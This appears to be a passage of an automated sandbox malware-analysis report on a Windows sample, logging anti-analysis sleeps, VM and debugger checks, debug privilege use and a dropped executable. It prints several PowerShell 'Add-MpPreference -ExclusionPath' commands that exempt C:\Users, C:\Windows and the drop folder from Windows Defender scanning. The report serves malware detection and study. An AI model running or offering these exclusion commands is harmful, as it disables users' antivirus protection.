Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6012Thread sleep count: 615 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4536Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2068Thread sleep count: 7908 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2068Thread sleep count: 1753 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5184Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0041E359 FindFirstFileA,FindFirstFileA,14_2_0041E359
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_00420370 FindFirstFileA,FindFirstFileA,14_2_00420370
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0042498B FindFirstFileA,FindFirstFileA,14_2_0042498B
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 99812Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 99687Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 99578Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 99469Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 99359Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 99249Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 99140Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 99031Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 98922Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 98812Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 98703Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 98593Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 98484Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 98375Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 98265Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 98155Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 98047Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 97937Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 97828Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 97719Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 97609Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 97497Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 97390Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 97281Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 97172Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 97062Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 96953Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 96844Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 96719Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 96609Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 96500Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 96390Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 96281Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 96172Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 96062Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 95953Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 95844Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 95719Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 95609Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 95500Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 95390Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 95281Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 95172Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 95062Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 94953Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 94843Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 94734Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 94624Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeThread delayed: delay time: 94515Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: VMwareVMware
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP[
Source: YYjRtxS70h.exe, 00000000.00000002.1799387443.000000000657B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: YYjRtxS70h.exe, 00000000.00000002.1785844596.0000000000C06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_0040168C mov eax, dword ptr fs:[00000030h]14_2_0040168C
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004016AA test dword ptr fs:[00000030h], 00000068h14_2_004016AA
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exeCode function: 14_2_004016BB mov eax, dword ptr fs:[00000030h]14_2_004016BB
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQo
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQoJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\UsersJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\WindowsJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\VmTatwGQo'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe "C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\VmTatwGQoJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\UsersJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\WindowsJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeQueries volume information: C:\Users\user\Desktop\YYjRtxS70h.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
